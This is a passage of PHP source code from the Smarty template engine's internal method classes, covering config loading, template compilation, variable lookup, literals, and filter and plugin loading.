                        if (is_file($_filepath) && time() - filemtime($_filepath) >= $exp_time) {
                            $unlink = true;
                        }
                    } else {
                        $unlink = true;
                    }
                }
                if ($unlink && is_file($_filepath) && @unlink($_filepath)) {
                    $_count++;
                    if (function_exists('opcache_invalidate')
                        && (!function_exists('ini_get') || strlen(ini_get('opcache.restrict_api')) < 1)
                    ) {
                        opcache_invalidate($_filepath, true);
                    } elseif (function_exists('apc_delete_file')) {
                        apc_delete_file($_filepath);
                    }
                }
            }
        }
        return $_count;
    }
}
<?php

/**
 * Smarty Method ClearConfig
 *
 * Smarty::clearConfig() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ClearConfig
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * clear a single or all config variables
     *
     * @api  Smarty::clearConfig()
     * @link https://www.smarty.net/docs/en/api.clear.config.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string|null                                             $name variable name or null
     *
     * @return \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty
     */
    public function clearConfig(Smarty_Internal_Data $data, $name = null)
    {
        if (isset($name)) {
            unset($data->config_vars[ $name ]);
        } else {
            $data->config_vars = array();
        }
        return $data;
    }
}
<?php

/**
 * Smarty Method CompileAllConfig
 *
 * Smarty::compileAllConfig() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_CompileAllConfig extends Smarty_Internal_Method_CompileAllTemplates
{
    /**
     * Compile all config files
     *
     * @api Smarty::compileAllConfig()
     *
     * @param \Smarty $smarty        passed smarty object
     * @param string  $extension     file extension
     * @param bool    $force_compile force all to recompile
     * @param int     $time_limit
     * @param int     $max_errors
     *
     * @return int number of template files recompiled
     */
    public function compileAllConfig(
        Smarty $smarty,
        $extension = '.conf',
        $force_compile = false,
        $time_limit = 0,
        $max_errors = null
    ) {
        return $this->compileAll($smarty, $extension, $force_compile, $time_limit, $max_errors, true);
    }
}
<?php

/**
 * Smarty Method CompileAllTemplates
 *
 * Smarty::compileAllTemplates() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_CompileAllTemplates
{
    /**
     * Valid for Smarty object
     *
     * @var int
     */
    public $objMap = 1;

    /**
     * Compile all template files
     *
     * @api Smarty::compileAllTemplates()
     *
     * @param \Smarty $smarty        passed smarty object
     * @param string  $extension     file extension
     * @param bool    $force_compile force all to recompile
     * @param int     $time_limit
     * @param int     $max_errors
     *
     * @return integer number of template files recompiled
     */
    public function compileAllTemplates(
        Smarty $smarty,
        $extension = '.tpl',
        $force_compile = false,
        $time_limit = 0,
        $max_errors = null
    ) {
        return $this->compileAll($smarty, $extension, $force_compile, $time_limit, $max_errors);
    }

    /**
     * Compile all template or config files
     *
     * @param \Smarty $smarty
     * @param string  $extension     template file name extension
     * @param bool    $force_compile force all to recompile
     * @param int     $time_limit    set maximum execution time
     * @param int     $max_errors    set maximum allowed errors
     * @param bool    $isConfig      flag true if called for config files
     *
     * @return int number of template files compiled
     */
    protected function compileAll(
        Smarty $smarty,
        $extension,
        $force_compile,
        $time_limit,
        $max_errors,
        $isConfig = false
    ) {
        // switch off time limit
        if (function_exists('set_time_limit')) {
            @set_time_limit($time_limit);
        }
        $_count = 0;
        $_error_count = 0;
        $sourceDir = $isConfig ? $smarty->getConfigDir() : $smarty->getTemplateDir();
        // loop over array of source directories
        foreach ($sourceDir as $_dir) {
            $_dir_1 = new RecursiveDirectoryIterator(
                $_dir,
                defined('FilesystemIterator::FOLLOW_SYMLINKS') ?
                    FilesystemIterator::FOLLOW_SYMLINKS : 0
            );
            $_dir_2 = new RecursiveIteratorIterator($_dir_1);
            foreach ($_dir_2 as $_fileinfo) {
                $_file = $_fileinfo->getFilename();
                if (substr(basename($_fileinfo->getPathname()), 0, 1) === '.' || strpos($_file, '.svn') !== false) {
                    continue;
                }
                if (substr_compare($_file, $extension, -strlen($extension)) !== 0) {
                    continue;
                }
                if ($_fileinfo->getPath() !== substr($_dir, 0, -1)) {
                    $_file = substr($_fileinfo->getPath(), strlen($_dir)) . DIRECTORY_SEPARATOR . $_file;
                }
                echo "\n<br>", $_dir, '---', $_file;
                flush();
                $_start_time = microtime(true);
                $_smarty = clone $smarty;
                //
                $_smarty->_cache = array();
                $_smarty->ext = new Smarty_Internal_Extension_Handler();
                $_smarty->ext->objType = $_smarty->_objType;
                $_smarty->force_compile = $force_compile;
                try {
                    /* @var Smarty_Internal_Template $_tpl */
                    $_tpl = new $smarty->template_class($_file, $_smarty);
                    $_tpl->caching = Smarty::CACHING_OFF;
                    $_tpl->source =
                        $isConfig ? Smarty_Template_Config::load($_tpl) : Smarty_Template_Source::load($_tpl);
                    if ($_tpl->mustCompile()) {
                        $_tpl->compileTemplateSource();
                        $_count++;
                        echo ' compiled in  ', microtime(true) - $_start_time, ' seconds';
                        flush();
                    } else {
                        echo ' is up to date';
                        flush();
                    }
                } catch (Exception $e) {
                    echo "\n<br>        ------>Error: ", $e->getMessage(), "<br><br>\n";
                    $_error_count++;
                }
                // free memory
                unset($_tpl);
                $_smarty->_clearTemplateCache();
                if ($max_errors !== null && $_error_count === $max_errors) {
                    echo "\n<br><br>too many errors\n";
                    exit(1);
                }
            }
        }
        echo "\n<br>";
        return $_count;
    }
}
<?php

/**
 * Smarty Method ConfigLoad
 *
 * Smarty::configLoad() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_ConfigLoad
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * load a config file, optionally load just selected sections
     *
     * @api  Smarty::configLoad()
     * @link https://www.smarty.net/docs/en/api.config.load.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $config_file filename
     * @param mixed                                                   $sections    array of section names, single
     *                                                                             section or null
     *
     * @return \Smarty|\Smarty_Internal_Data|\Smarty_Internal_Template
     * @throws \Exception
     */
    public function configLoad(Smarty_Internal_Data $data, $config_file, $sections = null)
    {
        $this->_loadConfigFile($data, $config_file, $sections, null);
        return $data;
    }

    /**
     * load a config file, optionally load just selected sections
     *
     * @api  Smarty::configLoad()
     * @link https://www.smarty.net/docs/en/api.config.load.tpl
     *
     * @param \Smarty|\Smarty_Internal_Data|\Smarty_Internal_Template $data
     * @param string                                                  $config_file filename
     * @param mixed                                                   $sections    array of section names, single
     *                                                                             section or null
     * @param int                                                     $scope       scope into which config variables
     *                                                                             shall be loaded
     *
     * @throws \Exception
     */
    public function _loadConfigFile(Smarty_Internal_Data $data, $config_file, $sections = null, $scope = 0)
    {
        /* @var \Smarty $smarty */
        $smarty = $data->_getSmartyObj();
        /* @var \Smarty_Internal_Template $confObj */
        $confObj = new Smarty_Internal_Template($config_file, $smarty, $data, null, null, null, null, true);
        $confObj->caching = Smarty::CACHING_OFF;
        $confObj->source->config_sections = $sections;
        $confObj->source->scope = $scope;
        $confObj->compiled = Smarty_Template_Compiled::load($confObj);
        $confObj->compiled->render($confObj);
        if ($data->_isTplObj()) {
            $data->compiled->file_dependency[ $confObj->source->uid ] =
                array($confObj->source->filepath, $confObj->source->getTimeStamp(), $confObj->source->type);
        }
    }

    /**
     * load config variables into template object
     *
     * @param \Smarty_Internal_Template $tpl
     * @param array                     $new_config_vars
     */
    public function _loadConfigVars(Smarty_Internal_Template $tpl, $new_config_vars)
    {
        $this->_assignConfigVars($tpl->parent->config_vars, $tpl, $new_config_vars);
        $tagScope = $tpl->source->scope;
        if ($tagScope >= 0) {
            if ($tagScope === Smarty::SCOPE_LOCAL) {
                $this->_updateVarStack($tpl, $new_config_vars);
                $tagScope = 0;
                if (!$tpl->scope) {
                    return;
                }
            }
            if ($tpl->parent->_isTplObj() && ($tagScope || $tpl->parent->scope)) {
                $mergedScope = $tagScope | $tpl->scope;
                if ($mergedScope) {
                    // update scopes
                    /* @var \Smarty_Internal_Template|\Smarty|\Smarty_Internal_Data $ptr */
                    foreach ($tpl->smarty->ext->_updateScope->_getAffectedScopes($tpl->parent, $mergedScope) as $ptr) {
                        $this->_assignConfigVars($ptr->config_vars, $tpl, $new_config_vars);
                        if ($tagScope && $ptr->_isTplObj() && isset($tpl->_cache[ 'varStack' ])) {
                            $this->_updateVarStack($tpl, $new_config_vars);
                        }
                    }
                }
            }
        }
    }

    /**
     * Assign all config variables in given scope
     *
     * @param array                     $config_vars     config variables in scope
     * @param \Smarty_Internal_Template $tpl
     * @param array                     $new_config_vars loaded config variables
     */
    public function _assignConfigVars(&$config_vars, Smarty_Internal_Template $tpl, $new_config_vars)
    {
        // copy global config vars
        foreach ($new_config_vars[ 'vars' ] as $variable => $value) {
            if ($tpl->smarty->config_overwrite || !isset($config_vars[ $variable ])) {
                $config_vars[ $variable ] = $value;
            } else {
                $config_vars[ $variable ] = array_merge((array)$config_vars[ $variable ], (array)$value);
            }
        }
        // scan sections
        $sections = $tpl->source->config_sections;
        if (!empty($sections)) {
            foreach ((array)$sections as $tpl_section) {
                if (isset($new_config_vars[ 'sections' ][ $tpl_section ])) {
                    foreach ($new_config_vars[ 'sections' ][ $tpl_section ][ 'vars' ] as $variable => $value) {
                        if ($tpl->smarty->config_overwrite || !isset($config_vars[ $variable ])) {
                            $config_vars[ $variable ] = $value;
                        } else {
                            $config_vars[ $variable ] = array_merge((array)$config_vars[ $variable ], (array)$value);
                        }
                    }
                }
            }
        }
    }

    /**
     * Update config variables in template local variable stack
     *
     * @param \Smarty_Internal_Template $tpl
     * @param array                     $config_vars
     */
    public function _updateVarStack(Smarty_Internal_Template $tpl, $config_vars)
    {
        $i = 0;
        while (isset($tpl->_cache[ 'varStack' ][ $i ])) {
            $this->_assignConfigVars($tpl->_cache[ 'varStack' ][ $i ][ 'config' ], $tpl, $config_vars);
            $i++;
        }
    }

    /**
     * gets  a config variable value
     *
     * @param \Smarty|\Smarty_Internal_Data|\Smarty_Internal_Template $data
     * @param string                                                  $varName the name of the config variable
     * @param bool                                                    $errorEnable
     *
     * @return null|string  the value of the config variable
     */
    public function _getConfigVariable(Smarty_Internal_Data $data, $varName, $errorEnable = true)
    {
        $_ptr = $data;
        while ($_ptr !== null) {
            if (isset($_ptr->config_vars[ $varName ])) {
                // found it, return it
                return $_ptr->config_vars[ $varName ];
            }
            // not found, try at parent
            $_ptr = $_ptr->parent;
        }
        if ($data->smarty->error_unassigned && $errorEnable) {
            // force a notice
            $x = $$varName;
        }
        return null;
    }
}
<?php

/**
 * Smarty Method CreateData
 *
 * Smarty::createData() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_CreateData
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * creates a data object
     *
     * @api  Smarty::createData()
     * @link https://www.smarty.net/docs/en/api.create.data.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty           $obj
     * @param \Smarty_Internal_Template|\Smarty_Internal_Data|\Smarty_Data|\Smarty|null $parent next higher level of Smarty
     *                                                                                          variables
     * @param string                                                                    $name   optional data block name
     *
     * @return \Smarty_Data data object
     */
    public function createData(Smarty_Internal_TemplateBase $obj, ?Smarty_Internal_Data $parent = null, $name = null)
    {
        /* @var Smarty $smarty */
        $smarty = $obj->_getSmartyObj();
        $dataObj = new Smarty_Data($parent, $smarty, $name);
        if ($smarty->debugging) {
            Smarty_Internal_Debug::register_data($dataObj);
        }
        return $dataObj;
    }
}
<?php

/**
 * Smarty Method GetAutoloadFilters
 *
 * Smarty::getAutoloadFilters() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetAutoloadFilters extends Smarty_Internal_Method_SetAutoloadFilters
{
    /**
     * Get autoload filters
     *
     * @api Smarty::getAutoloadFilters()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type type of filter to get auto loads
     *                                                                              for. Defaults to all autoload
     *                                                                              filters
     *
     * @return array array( 'type1' => array( 'filter1', 'filter2', … ) ) or array( 'filter1', 'filter2', …) if $type
     *                was specified
     * @throws \SmartyException
     */
    public function getAutoloadFilters(Smarty_Internal_TemplateBase $obj, $type = null)
    {
        $smarty = $obj->_getSmartyObj();
        if ($type !== null) {
            $this->_checkFilterType($type);
            return isset($smarty->autoload_filters[ $type ]) ? $smarty->autoload_filters[ $type ] : array();
        }
        return $smarty->autoload_filters;
    }
}
<?php

/**
 * Smarty Method GetConfigVariable
 *
 * Smarty::getConfigVariable() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetConfigVariable
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * gets  a config variable value
     *
     * @param \Smarty|\Smarty_Internal_Data|\Smarty_Internal_Template $data
     * @param string                                                  $varName the name of the config variable
     * @param bool                                                    $errorEnable
     *
     * @return null|string  the value of the config variable
     */
    public function getConfigVariable(Smarty_Internal_Data $data, $varName = null, $errorEnable = true)
    {
        return $data->ext->configLoad->_getConfigVariable($data, $varName, $errorEnable);
    }
}
<?php

/**
 * Smarty Method GetConfigVars
 *
 * Smarty::getConfigVars() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetConfigVars
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * Returns a single or all config variables
     *
     * @api  Smarty::getConfigVars()
     * @link https://www.smarty.net/docs/en/api.get.config.vars.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $varname        variable name or null
     * @param bool                                                    $search_parents include parent templates?
     *
     * @return mixed variable value or or array of variables
     */
    public function getConfigVars(Smarty_Internal_Data $data, $varname = null, $search_parents = true)
    {
        $_ptr = $data;
        $var_array = array();
        while ($_ptr !== null) {
            if (isset($varname)) {
                if (isset($_ptr->config_vars[ $varname ])) {
                    return $_ptr->config_vars[ $varname ];
                }
            } else {
                $var_array = array_merge($_ptr->config_vars, $var_array);
            }
            // not found, try at parent
            if ($search_parents) {
                $_ptr = $_ptr->parent;
            } else {
                $_ptr = null;
            }
        }
        if (isset($varname)) {
            return '';
        } else {
            return $var_array;
        }
    }
}
<?php

/**
 * Smarty Method GetDebugTemplate
 *
 * Smarty::getDebugTemplate() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetDebugTemplate
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * return name of debugging template
     *
     * @api Smarty::getDebugTemplate()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     *
     * @return string
     */
    public function getDebugTemplate(Smarty_Internal_TemplateBase $obj)
    {
        $smarty = $obj->_getSmartyObj();
        return $smarty->debug_tpl;
    }
}
<?php

/**
 * Smarty Method GetDefaultModifiers
 *
 * Smarty::getDefaultModifiers() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetDefaultModifiers
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Get default modifiers
     *
     * @api Smarty::getDefaultModifiers()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     *
     * @return array list of default modifiers
     */
    public function getDefaultModifiers(Smarty_Internal_TemplateBase $obj)
    {
        $smarty = $obj->_getSmartyObj();
        return $smarty->default_modifiers;
    }
}
<?php

/**
 * Smarty Method GetGlobal
 *
 * Smarty::getGlobal() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetGlobal
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * Returns a single or all global  variables
     *
     * @api Smarty::getGlobal()
     *
     * @param \Smarty_Internal_Data $data
     * @param string                $varName variable name or null
     *
     * @return string|array variable value or or array of variables
     */
    public function getGlobal(Smarty_Internal_Data $data, $varName = null)
    {
        if (isset($varName)) {
            if (isset(Smarty::$global_tpl_vars[ $varName ])) {
                return Smarty::$global_tpl_vars[ $varName ]->value;
            } else {
                return '';
            }
        } else {
            $_result = array();
            foreach (Smarty::$global_tpl_vars as $key => $var) {
                $_result[ $key ] = $var->value;
            }
            return $_result;
        }
    }
}
<?php

/**
 * Smarty Method GetRegisteredObject
 *
 * Smarty::getRegisteredObject() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetRegisteredObject
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * return a reference to a registered object
     *
     * @api  Smarty::getRegisteredObject()
     * @link https://www.smarty.net/docs/en/api.get.registered.object.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $object_name object name
     *
     * @return object
     * @throws \SmartyException if no such object is found
     */
    public function getRegisteredObject(Smarty_Internal_TemplateBase $obj, $object_name)
    {
        $smarty = $obj->_getSmartyObj();
        if (!isset($smarty->registered_objects[ $object_name ])) {
            throw new SmartyException("'$object_name' is not a registered object");
        }
        if (!is_object($smarty->registered_objects[ $object_name ][ 0 ])) {
            throw new SmartyException("registered '$object_name' is not an object");
        }
        return $smarty->registered_objects[ $object_name ][ 0 ];
    }
}
<?php

/**
 * Smarty Method GetStreamVariable
 *
 * Smarty::getStreamVariable() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetStreamVariable
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * gets  a stream variable
     *
     * @api Smarty::getStreamVariable()
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $variable the stream of the variable
     *
     * @return mixed
     * @throws \SmartyException
     */
    public function getStreamVariable(Smarty_Internal_Data $data, $variable)
    {
        $_result = '';
        $fp = fopen($variable, 'r+');
        if ($fp) {
            while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
                $_result .= $current_line;
            }
            fclose($fp);
            return $_result;
        }
        $smarty = isset($data->smarty) ? $data->smarty : $data;
        if ($smarty->error_unassigned) {
            throw new SmartyException('Undefined stream variable "' . $variable . '"');
        } else {
            return null;
        }
    }
}
<?php

/**
 * Smarty Method GetTags
 *
 * Smarty::getTags() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetTags
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Return array of tag/attributes of all tags used by an template
     *
     * @api  Smarty::getTags()
     * @link https://www.smarty.net/docs/en/api.get.tags.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param null|string|Smarty_Internal_Template                            $template
     *
     * @return array of tag/attributes
     * @throws \Exception
     * @throws \SmartyException
     */
    public function getTags(Smarty_Internal_TemplateBase $obj, $template = null)
    {
        /* @var Smarty $smarty */
        $smarty = $obj->_getSmartyObj();
        if ($obj->_isTplObj() && !isset($template)) {
            $tpl = clone $obj;
        } elseif (isset($template) && $template->_isTplObj()) {
            $tpl = clone $template;
        } elseif (isset($template) && is_string($template)) {
            /* @var Smarty_Internal_Template $tpl */
            $tpl = new $smarty->template_class($template, $smarty);
            // checks if template exists
            if (!$tpl->source->exists) {
                throw new SmartyException("Unable to load template {$tpl->source->type} '{$tpl->source->name}'");
            }
        }
        if (isset($tpl)) {
            $tpl->smarty = clone $tpl->smarty;
            $tpl->smarty->_cache[ 'get_used_tags' ] = true;
            $tpl->_cache[ 'used_tags' ] = array();
            $tpl->smarty->merge_compiled_includes = false;
            $tpl->smarty->disableSecurity();
            $tpl->caching = Smarty::CACHING_OFF;
            $tpl->loadCompiler();
            $tpl->compiler->compileTemplate($tpl);
            return $tpl->_cache[ 'used_tags' ];
        }
        throw new SmartyException('Missing template specification');
    }
}
<?php

/**
 * Smarty Method GetTemplateVars
 *
 * Smarty::getTemplateVars() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_GetTemplateVars
{
    /**
     * Valid for all objects
     *
     * @var int
     */
    public $objMap = 7;

    /**
     * Returns a single or all template variables
     *
     * @api  Smarty::getTemplateVars()
     * @link https://www.smarty.net/docs/en/api.get.template.vars.tpl
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty      $data
     * @param string                                                       $varName       variable name or null
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty|null $_ptr          optional pointer to data object
     * @param bool                                                         $searchParents include parent templates?
     *
     * @return mixed variable value or or array of variables
     */
    public function getTemplateVars(
        Smarty_Internal_Data $data,
        $varName = null,
        ?Smarty_Internal_Data $_ptr = null,
        $searchParents = true
    ) {
        if (isset($varName)) {
            $_var = $this->_getVariable($data, $varName, $_ptr, $searchParents, false);
            if (is_object($_var)) {
                return $_var->value;
            } else {
                return null;
            }
        } else {
            $_result = array();
            if ($_ptr === null) {
                $_ptr = $data;
            }
            while ($_ptr !== null) {
                foreach ($_ptr->tpl_vars as $key => $var) {
                    if (!array_key_exists($key, $_result)) {
                        $_result[ $key ] = $var->value;
                    }
                }
                // not found, try at parent
                if ($searchParents && isset($_ptr->parent)) {
                    $_ptr = $_ptr->parent;
                } else {
                    $_ptr = null;
                }
            }
            if ($searchParents && isset(Smarty::$global_tpl_vars)) {
                foreach (Smarty::$global_tpl_vars as $key => $var) {
                    if (!array_key_exists($key, $_result)) {
                        $_result[ $key ] = $var->value;
                    }
                }
            }
            return $_result;
        }
    }

    /**
     * gets the object of a Smarty variable
     *
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $data
     * @param string                                                  $varName       the name of the Smarty variable
     * @param \Smarty_Internal_Data|\Smarty_Internal_Template|\Smarty $_ptr          optional pointer to data object
     * @param bool                                                    $searchParents search also in parent data
     * @param bool                                                    $errorEnable
     *
     * @return \Smarty_Variable
     */
    public function _getVariable(
        Smarty_Internal_Data $data,
        $varName,
        ?Smarty_Internal_Data $_ptr = null,
        $searchParents = true,
        $errorEnable = true
    ) {
        if ($_ptr === null) {
            $_ptr = $data;
        }
        while ($_ptr !== null) {
            if (isset($_ptr->tpl_vars[ $varName ])) {
                // found it, return it
                return $_ptr->tpl_vars[ $varName ];
            }
            // not found, try at parent
            if ($searchParents && isset($_ptr->parent)) {
                $_ptr = $_ptr->parent;
            } else {
                $_ptr = null;
            }
        }
        if (isset(Smarty::$global_tpl_vars[ $varName ])) {
            // found it, return it
            return Smarty::$global_tpl_vars[ $varName ];
        }
        if ($errorEnable && $data->_getSmartyObj()->error_unassigned) {
            // force a notice
            $x = $$varName;
        }
        return new Smarty_Undefined_Variable;
    }
}
<?php

/**
 * Smarty Method GetLiterals
 *
 * Smarty::getLiterals() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_Literals
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Get literals
     *
     * @api Smarty::getLiterals()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     *
     * @return array list of literals
     */
    public function getLiterals(Smarty_Internal_TemplateBase $obj)
    {
        $smarty = $obj->_getSmartyObj();
        return (array)$smarty->literals;
    }

    /**
     * Add literals
     *
     * @api Smarty::addLiterals()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param array|string                                                    $literals literal or list of literals
     *                                                                                  to addto add
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function addLiterals(Smarty_Internal_TemplateBase $obj, $literals = null)
    {
        if (isset($literals)) {
            $this->set($obj->_getSmartyObj(), (array)$literals);
        }
        return $obj;
    }

    /**
     * Set literals
     *
     * @api Smarty::setLiterals()
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param array|string                                                    $literals literal or list of literals
     *                                                                                  to setto set
     *
     * @return \Smarty|\Smarty_Internal_Template
     * @throws \SmartyException
     */
    public function setLiterals(Smarty_Internal_TemplateBase $obj, $literals = null)
    {
        $smarty = $obj->_getSmartyObj();
        $smarty->literals = array();
        if (!empty($literals)) {
            $this->set($smarty, (array)$literals);
        }
        return $obj;
    }

    /**
     * common setter for literals for easier handling of duplicates the
     * Smarty::$literals array gets filled with identical key values
     *
     * @param \Smarty $smarty
     * @param array   $literals
     *
     * @throws \SmartyException
     */
    private function set(Smarty $smarty, $literals)
    {
        $literals = array_combine($literals, $literals);
        $error = isset($literals[ $smarty->left_delimiter ]) ? array($smarty->left_delimiter) : array();
        $error = isset($literals[ $smarty->right_delimiter ]) ? $error[] = $smarty->right_delimiter : $error;
        if (!empty($error)) {
            throw new SmartyException(
                'User defined literal(s) "' . $error .
                '" may not be identical with left or right delimiter'
            );
        }
        $smarty->literals = array_merge((array)$smarty->literals, (array)$literals);
    }
}
<?php

/**
 * Smarty Method LoadFilter
 *
 * Smarty::loadFilter() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_LoadFilter
{
    /**
     * Valid for Smarty and template object
     *
     * @var int
     */
    public $objMap = 3;

    /**
     * Valid filter types
     *
     * @var array
     */
    private $filterTypes = array('pre' => true, 'post' => true, 'output' => true, 'variable' => true);

    /**
     * load a filter of specified type and name
     *
     * @api  Smarty::loadFilter()
     *
     * @link https://www.smarty.net/docs/en/api.load.filter.tpl
     *
     * @param \Smarty_Internal_TemplateBase|\Smarty_Internal_Template|\Smarty $obj
     * @param string                                                          $type filter type
     * @param string                                                          $name filter name
     *
     * @return bool
     * @throws SmartyException if filter could not be loaded
     */
    public function loadFilter(Smarty_Internal_TemplateBase $obj, $type, $name)
    {
        $smarty = $obj->_getSmartyObj();
        $this->_checkFilterType($type);
        $_plugin = "smarty_{$type}filter_{$name}";
        $_filter_name = $_plugin;
        if (is_callable($_plugin)) {
            $smarty->registered_filters[ $type ][ $_filter_name ] = $_plugin;
            return true;
        }
        if ($smarty->loadPlugin($_plugin)) {
            if (class_exists($_plugin, false)) {
                $_plugin = array($_plugin, 'execute');
            }
            if (is_callable($_plugin)) {
                $smarty->registered_filters[ $type ][ $_filter_name ] = $_plugin;
                return true;
            }
        }
        throw new SmartyException("{$type}filter '{$name}' not found or callable");
    }

    /**
     * Check if filter type is valid
     *
     * @param string $type
     *
     * @throws \SmartyException
     */
    public function _checkFilterType($type)
    {
        if (!isset($this->filterTypes[ $type ])) {
            throw new SmartyException("Illegal filter type '{$type}'");
        }
    }
}
<?php

/**
 * Smarty Extension Loadplugin
 *
 * $smarty->loadPlugin() method
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Method_LoadPlugin
{
    /**
     * Cache of searched plugin files
     *
     * @var array
     */
    public $plugin_files = array();

    /**
     * Takes unknown classes and loads plugin files for them
     * class name format: Smarty_PluginType_PluginName
     * plugin filename format: plugintype.pluginname.php
     *
     * @param \Smarty $smarty
     * @param string  $plugin_name class plugin name to load
     * @param bool    $check       check if already loaded
     *
     * @return bool|string
     * @throws \SmartyException
     */
    public function loadPlugin(Smarty $smarty, $plugin_name, $check)
    {
        // if function or class exists, exit silently (already loaded)
        if ($check && (is_callable($plugin_name) || class_exists($plugin_name, false))) {
            return true;
        }
        if (!preg_match('#^smarty_((internal)|([^_]+))_(.+)$#i', $plugin_name, $match)) {
            throw new SmartyException("plugin {$plugin_name} is not a valid name format");
        }
        if (!empty($match[ 2 ])) {
            $file = SMARTY_SYSPLUGINS_DIR . smarty_strtolower_ascii($plugin_name) . '.php';
            if (isset($this->plugin_files[ $file ])) {
                if ($this->plugin_files[ $file ] !== false) {
                    return $this->plugin_files[ $file ];
                } else {
                    return false;
                }
            } else {
                if (is_file($file)) {
                    $this->plugin_files[ $file ] = $file;
                    include_once $file;
                    return $file;
                } else {
                    $this->plugin_files[ $file ] = false;
                    return false;
                }
            }
        }
        // plugin filename is expected to be: [type].[name].php
        $_plugin_filename = "{$match[1]}.{$match[4]}.php";
        $_lower_filename = smarty_strtolower_ascii($_plugin_filename);
        if (isset($this->plugin_files)) {
            if (isset($this->plugin_files[ 'plugins_dir' ][ $_lower_filename ])) {
                if (!$smarty->use_include_path || $this->plugin_files[ 'plugins_dir' ][ $_lower_filename ] !== false) {
                    return $this->plugin_files[ 'plugins_dir' ][ $_lower_filename ];
                }
            }
            if (!$smarty->use_include_path || $smarty->ext->_getIncludePath->isNewIncludePath($smarty)) {
                unset($this->plugin_files[ 'include_path' ]);
            } else {
                if (isset($this->plugin_files[ 'include_path' ][ $_lower_filename ])) {
                    return $this->plugin_files[ 'include_path' ][ $_lower_filename ];
                }
            }
        }
        $_file_names = array($_plugin_filename);
        if ($_lower_filename !== $_plugin_filename) {
            $_file_names[] = $_lower_filename;
        }
        $_p_dirs = $smarty->getPluginsDir();
        if (!isset($this->plugin_files[ 'plugins_dir' ][ $_lower_filename ])) {
            // loop through plugin dirs and find the plugin
            foreach ($_p_dirs as $_plugin_dir) {
                foreach ($_file_names as $name) {
                    $file = $_plugin_dir . $name;
